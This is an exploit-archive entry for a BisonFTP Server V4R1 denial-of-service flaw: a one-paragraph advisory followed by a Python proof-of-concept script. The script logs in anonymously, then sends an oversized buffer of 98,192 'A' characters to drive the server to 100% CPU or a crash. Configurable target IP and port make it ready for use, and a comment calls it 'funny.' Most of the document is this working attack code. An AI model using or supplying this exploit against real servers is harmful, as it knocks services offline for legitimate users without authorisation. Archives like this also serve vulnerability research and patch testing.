source: https://www.securityfocus.com/bid/14079/info BisonFTP is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. Reports indicate that the issue may be exploited only after successful authentication. #!/usr/bin/python # # Vulnerability: Denial Of Service # Discovered on: June 26, 2005 by fRoGGz - SecuBox Labs # When an invalid buffer size is sent to BisonFTPD -> DoS (100% CPU usage or crash) # NB: Sorry for Python purists, it's the first time that i use it ;) import socket import time n = 1 t = 98192 #Try others, it's funny. p = 21 # Set your port here. ip = "192.168.0.1" # Set ip here. boom = "PoC "+'\x41'*t print "\n\nVulnerable product: BisonFTP Server V4R1" print "Denial of Service vulnerability" print "---------------------------------------------" print "Discovered & coded by fRoGGz - SecuBox Labs\n" try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((ip,p)) d=s.recv(1024) print "[+] " +d print "[+] Utilisateur." time.sleep(1) s.send('USER Anonymous\r\n') s.recv(512) print "[+] Mot de passe." time.sleep(1) s.send('PASS Anonymous\r\n') s.recv(512) print "[+] Envoi malicieux.\n\nDoS termine !\n" time.sleep(1) s.send(boom+'r\n\n') except: print "[+] Machine indisponible, verifiez le port ou l'ip."